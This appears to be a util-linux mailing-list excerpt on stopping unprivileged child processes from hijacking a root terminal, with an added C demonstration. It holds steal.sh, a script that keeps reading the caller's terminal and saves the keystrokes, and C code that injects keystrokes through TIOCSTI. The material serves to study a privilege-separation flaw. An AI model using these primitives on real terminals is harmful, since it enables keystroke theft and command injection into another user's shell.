On 02/03/16 20:35, Stanislav Brabec wrote:
Other possible fixes would be:
- Request redirection of all I/O channels. (I.e. a documentation fix
plus a possible command line option to make it simpler.)
- Or create a custom pty container (like script does).
- Or create a kernel level fix restricting TIOCSTI and leave utilities as
they are.
The first two will have side effects; the third seems to be the right way to me.
+1
IMHO a process without CAP_SYS_ADMIN (or similar) shouldn't be able to
fake input¹ into a terminal owned² by a different user.
¹ yes, that's the goal of TIOCSTI
² Not a complete solution, since you could have:
$ su root su $USER -s ./test_tiocsti
but if you are the owner of the terminal, it could do all kinds of nasty
things all the way down anyway.
Additionally, https://bugzilla.redhat.com/show_bug.cgi?id=173008 says
that even that does not handle all possible attacks, because the attacker can
still read and write to the terminal:
==== steal.sh ====
#!/bin/sh
# Background subshell that outlives the runuser session and keeps
# reading from and writing to the terminal the caller still sits at.
(
sleep 3                         # wait until runuser has returned to the caller
exec 0>&1                       # reopen stdin from the inherited terminal fd
echo "Hallo">/dev/stdout        # write to the caller's terminal
cat>/tmp/nobody-savefile        # record whatever the caller types next
)&
==================
~/util-linux # ./runuser -u nobody ./steal.sh
~/util-linux # Hallo
Nice use of a background process with what is otherwise expected.
The problem is that the user is tricked into thinking that the child process
[tree] has finished while it hasn't.
However, it doesn't seem to work here:
./steal.sh: line 5: /dev/stdout: Permission denied
cat: -: Input/output error
--
To unsubscribe from this list: send the line "unsubscribe util-linux" in
the body of a message to majordomo@xxxxxxxxxxxxxxx
More majordomo info at http://vger.kernel.org/majordomo-info.html
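The "fake input" primitive the thread is about, as an added example that is not part of the thread or of util-linux: a small C program that pushes bytes into a terminal with TIOCSTI, and a sandboxed reproduction that allocates a pty pair with openpty(), makes the slave the controlling terminal of a child (the situation a su/runuser child is in when it inherits the caller's tty) and reads the injected line back from that same terminal. The kernel check it runs into is assumed to be the one in tty_io.c: TIOCSTI is refused with EPERM unless the target is the caller's controlling terminal or the caller has CAP_SYS_ADMIN, and with EIO on kernels that have the legacy TIOCSTI sysctl/config switched off. The binary name tiocsti_demo, the injected strings and the result codes are this example's own choices.

```c
/* tiocsti_demo.c - added example, not code from the util-linux thread.
 * Build: cc -Wall -o tiocsti_demo tiocsti_demo.c -lutil
 * Attack shape from the thread: root runs `runuser -u nobody ./tiocsti_demo`
 * from an interactive terminal; fd 0 is still root's terminal, so the line
 * injected below is read and executed by root's shell once runuser returns. */
#include <errno.h>
#include <pty.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <unistd.h>

/* Result codes of demo_pty_injection() (names chosen for this example). */
enum { INJ_SETUP_FAILED = -1, INJ_REFUSED = 0, INJ_OK = 1 };

/* Push every byte of s into the terminal behind fd as if it had been typed.
 * Returns the number of bytes injected, or -1 with errno set on the first
 * failure: ENOTTY (fd is not a terminal), EPERM (not the caller's controlling
 * tty and no CAP_SYS_ADMIN), EIO (kernel has legacy TIOCSTI disabled). */
int tty_inject(int fd, const char *s)
{
    int n = 0;
    for (; *s; s++, n++) {
        char c = *s;
        if (ioctl(fd, TIOCSTI, &c) < 0)
            return -1;
    }
    return n;
}

/* Negative control: TIOCSTI on something that is not a terminal.
 * Returns the errno tty_inject() reports (expected ENOTTY), 0 if it succeeded. */
int inject_into_pipe_errno(void)
{
    int pfd[2];
    if (pipe(pfd) < 0)
        return errno;
    int err = tty_inject(pfd[0], "x") < 0 ? errno : 0;
    close(pfd[0]);
    close(pfd[1]);
    return err;
}

/* Sandboxed reproduction: a child adopts a fresh pty slave as its controlling
 * terminal, injects "id\n" into it and reads it back from the same fd (the pty
 * is in canonical mode, so read() returns once the '\n' arrives).
 * Returns INJ_OK if the line came back, INJ_REFUSED if the kernel rejected
 * TIOCSTI with EPERM or EIO, INJ_SETUP_FAILED on any other problem. */
int demo_pty_injection(void)
{
    int master, slave, pfd[2];
    if (pipe(pfd) < 0 || openpty(&master, &slave, NULL, NULL, NULL) < 0)
        return INJ_SETUP_FAILED;
    pid_t pid = fork();
    if (pid < 0)
        return INJ_SETUP_FAILED;
    if (pid == 0) {
        char buf[16];
        int status = INJ_SETUP_FAILED;
        close(master);
        close(pfd[0]);
        /* New session, then take the slave as controlling tty (TIOCSCTTY). */
        if (setsid() >= 0 && ioctl(slave, TIOCSCTTY, 0) == 0) {
            if (tty_inject(slave, "id\n") == 3) {
                ssize_t n = read(slave, buf, sizeof buf);
                status = (n == 3 && memcmp(buf, "id\n", 3) == 0)
                         ? INJ_OK : INJ_SETUP_FAILED;
            } else if (errno == EPERM || errno == EIO) {
                status = INJ_REFUSED;
            }
        }
        write(pfd[1], &status, sizeof status);
        _exit(0);
    }
    close(slave);
    close(pfd[1]);
    int status = INJ_SETUP_FAILED;
    if (read(pfd[0], &status, sizeof status) != sizeof status)
        status = INJ_SETUP_FAILED;
    close(pfd[0]);
    close(master);
    waitpid(pid, NULL, 0);
    return status;
}

int main(void)
{
    int r = demo_pty_injection();
    printf("pty sandbox: %s\n",
           r == INJ_OK ? "injected 'id' was read back as terminal input"
           : r == INJ_REFUSED ? "kernel refused TIOCSTI (not controlling tty, or disabled)"
           : "setup failed (no pty available?)");
    /* The runuser scenario: fd 0 is the caller's terminal. */
    if (tty_inject(STDIN_FILENO, "echo injected-via-TIOCSTI\n") < 0)
        printf("stdin: TIOCSTI failed: %s\n", strerror(errno));
    return 0;
}
```

The sandbox result is what a kernel-level restriction as proposed in the thread would change: today a child whose controlling terminal is the shared tty gets INJ_OK, and only a process that has been detached from that tty (or a kernel with legacy TIOCSTI off) gets INJ_REFUSED. Note that detaching the child with setsid() only blocks TIOCSTI; the inherited fd can still be read and written, which is exactly the residual problem steal.sh above demonstrates.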